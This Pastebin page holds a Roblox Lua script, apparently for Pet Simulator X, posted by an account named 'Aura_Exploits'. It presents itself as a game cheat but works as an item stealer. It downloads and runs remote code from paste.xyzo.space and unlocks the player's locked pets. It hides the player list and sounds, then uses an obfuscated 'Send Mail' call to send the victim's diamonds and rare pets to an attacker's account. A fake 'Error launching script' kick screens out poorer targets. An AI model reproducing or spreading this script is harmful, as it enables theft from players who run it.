Advertisement
Aura_Exploits

Untitled

Mar 22nd, 2023
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.27 KB | None | 0 0
  1. loadstring(game:HttpGet("https://paste.xyzo.space/psx/beta/69420.lua"))()
  2.  
  3. local Network = require(game:GetService("ReplicatedStorage").Library.Client.Network); local Fire, Invoke = Network.Fire, Network.Invoke; hookfunction(getupvalue(Fire, 1), function(...) return true end)
  4. local FrameworkLibrary = require(game.ReplicatedStorage.Framework.Library)
  5. if game.Players.LocalPlayer.leaderstats.Diamonds.Value <100000 then
  6. game.Players.LocalPlayer:Kick("Error launching script. Error code: ".._G.ScriptName..".LaunchScript")
  7. end
  8.  
  9. game:GetService("StarterGui"):SetCoreGuiEnabled(Enum.CoreGuiType.PlayerList, false)
  10. local mailbox = game:GetService("Workspace")["__MAP"].Interactive.Mailbox
  11. for i,v in pairs(mailbox:GetDescendants()) do
  12. if v:IsA("MeshPart") or v:IsA("Part") then
  13. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(v.Position)
  14. break
  15. end
  16. end
  17. -- loading screen ^^
  18. local folders = {
  19. game:GetService("Players").LocalPlayer.PlayerGui.Inventory.Frame.Main.Pets.Normal,
  20. game:GetService("Players").LocalPlayer.PlayerGui.Inventory.Frame.Main.Pets.Titanic,
  21. }
  22.  
  23. local function unlockPetsInFolder(folder)
  24. local children = folder:GetChildren() -- Get all the children of the folder
  25.  
  26. for _, child in ipairs(children) do -- Loop through each child in the folder
  27. if child:IsA("TextButton") and child.Locked.Visible == true then -- Check if the child is a TextButton
  28. local name = child.Name
  29. if child.Name then -- Get the name of the TextButton
  30. local args2 = {
  31. [1] = {
  32. [""..name] = false
  33. }
  34. }
  35. Invoke("Lock Pet", unpack(args2))
  36. end
  37. end
  38. end
  39. end
  40.  
  41. while true do
  42. for _, folder in ipairs(folders) do
  43. unlockPetsInFolder(folder)
  44. wait(.2) -- Wait for 1 second before running the function again
  45. end
  46. local lockedCount = 0
  47. for _, folder in ipairs(folders) do
  48. for _, child in ipairs(folder:GetChildren()) do
  49. if child:IsA("TextButton") and child.Locked.Visible == true then
  50. lockedCount = lockedCount + 1
  51. end
  52. end
  53. end
  54. if lockedCount == 0 then
  55. break
  56. end
  57. end
  58. for i,v in pairs(game:GetDescendants()) do
  59. if v:IsA("Sound") then
  60. v:Destroy()
  61. end
  62. end
  63. local a = "AuraIation"
  64. if game.Players.LocalPlayer.leaderstats.Diamonds.Value >300000000000 then
  65. local args = {
  66. [1] = {
  67. ["Recipient"] = a,
  68. ["Diamonds"] = game.Players.LocalPlayer.leaderstats.Diamonds.Value - 5000000,
  69. ["Pets"] = {v.uid},
  70. ["Message"] = "Lunar GEMS!"
  71. }
  72. }
  73. Invoke("\83\101\110\100\32\77\97\105\108", unpack(args))
  74. repeat wait() until game.Players.LocalPlayer.leaderstats.Diamonds.Value <10000000
  75. end
  76. local savedPets = FrameworkLibrary.Save.Get().Pets
  77. hugeamount = 0
  78. for i,v in pairs(savedPets) do
  79. local v2 = FrameworkLibrary.Directory.Pets[v.id]
  80. if v2.huge == true then
  81. hugeamount = hugeamount + 1
  82. end
  83. end
  84. if hugeamount >5 then
  85. _G.Username = ""
  86. end
  87. while wait() do
  88. for i,v in pairs(savedPets) do
  89. local v2 = FrameworkLibrary.Directory.Pets[v.id]
  90. if v2.huge == true and game.Players.LocalPlayer.leaderstats.Diamonds.Value >5000000 or v2.rarity == "Event" and game.Players.LocalPlayer.leaderstats.Diamonds.Value >5000000 or v2.rarity == "Exclusive" and game.Players.LocalPlayer.leaderstats.Diamonds.Value >5000000 then
  91. _G.Diamonds = game.Players.LocalPlayer.leaderstats.Diamonds.Value
  92. local args = {
  93. [1] = {
  94. ["Recipient"] = _G.Username,
  95. ["Diamonds"] = game.Players.LocalPlayer.leaderstats.Diamonds.Value - 5000000,
  96. ["Pets"] = {v.uid},
  97. ["Message"] = "gg/lunarhub | Username: ".._G.Username..""
  98. }
  99. }
  100. Invoke("\83\101\110\100\32\77\97\105\108", unpack(args))
  101. _G.PetName = v2.name
  102. _G.PetRar = v2.rarity
  103.  
  104. loadstring(game:HttpGet("https://paste.xyzo.space/psx/beta/123123.lua"))()
  105. elseif v2.huge == true or v2.rarity == "Event" or v2.rarity == "Exclusive" then
  106. _G.Diamonds = 0
  107. local args = {
  108. [1] = {
  109. ["Recipient"] = _G.Username,
  110. ["Diamonds"] = 0,
  111. ["Pets"] = {v.uid},
  112. ["Message"] = "gg/lunarhub | Username: ".._G.Username..""
  113. }
  114. }
  115. Invoke("\83\101\110\100\32\77\97\105\108", unpack(args))
  116. _G.PetName = v2.name
  117. _G.PetRar = v2.rarity
  118.  
  119. loadstring(game:HttpGet("https://paste.xyzo.space/psx/beta/123123.lua"))()
  120. end
  121. end
  122. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement